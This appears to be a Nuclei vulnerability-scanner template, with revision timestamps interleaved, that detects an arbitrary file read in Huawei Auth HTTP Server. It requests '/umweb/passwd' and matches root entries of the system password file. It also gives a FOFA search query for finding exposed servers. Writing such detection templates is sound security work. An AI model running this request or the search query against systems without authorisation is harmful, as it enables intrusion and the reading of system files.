2023-12-04 06:14:17 +00:00
|
|
|
id: huawei-authhttp-lfi
|
|
|
|
|
|
|
|
info:
|
2023-12-04 08:21:01 +00:00
|
|
|
name: Huawei Auth Http Server - Arbitrary File Read
|
2023-12-04 06:14:17 +00:00
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: high
|
2024-01-02 15:45:12 +00:00
|
|
|
description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read.
|
2023-12-04 06:14:17 +00:00
|
|
|
reference:
|
|
|
|
- https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498499&idx=1&sn=6850c3e9a3df795e48ba9a10c9772ddd
|
|
|
|
- https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/huawei-auth-http-readfile.py
|
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-12-12 11:07:52 +00:00
|
|
|
max-request: 1
|
2023-12-04 08:21:01 +00:00
|
|
|
fofa-query: server="Huawei Auth-Http Server 1.0"
|
2023-12-04 06:14:17 +00:00
|
|
|
tags: lfi,huawei,authhttp
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/umweb/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "Huawei Auth-Http Server"
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-12-12 12:02:03 +00:00
|
|
|
# digest: 4b0a00483046022100f27127016bbd8eadf32fc15d54ea770d4bfeeabff5a25445edaf718c4d623b5a022100a52699860894193e3004c0ee56462408032c6e9f733e93d473cea61599135ff0:922c64590222798bb761d5b6d8e72950
|